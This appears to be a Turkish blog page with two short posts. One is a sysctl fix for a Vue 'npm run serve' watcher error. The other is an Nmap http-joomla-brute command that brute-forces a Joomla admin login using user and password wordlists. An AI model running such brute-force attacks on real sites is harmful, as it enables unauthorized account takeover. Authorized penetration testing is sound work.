25 Aralık 2018 Salı

Npm run serve | events.js Unhandled 'error' event hatası giderme

Vue ile oluşturulan bir projede alınan hatayı gidermek için gerekli kod
echo fs.inotify.max_user_watches=524288 | sudo tee -a /etc/sysctl.conf && sudo sysctl -p

10 Aralık 2018 Pazartesi

Nmap http-joomla-brute kullanımı


Aşağıdaki parametreler düzenlenerek Joomla admin paneli için brute force denenebilir.

nmap -p80 --script http-joomla-brute --script-args 'userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt,http-joomla-brute.hostname=domain.com, brute.firstonly=true' <target-ip> -vvv -Pn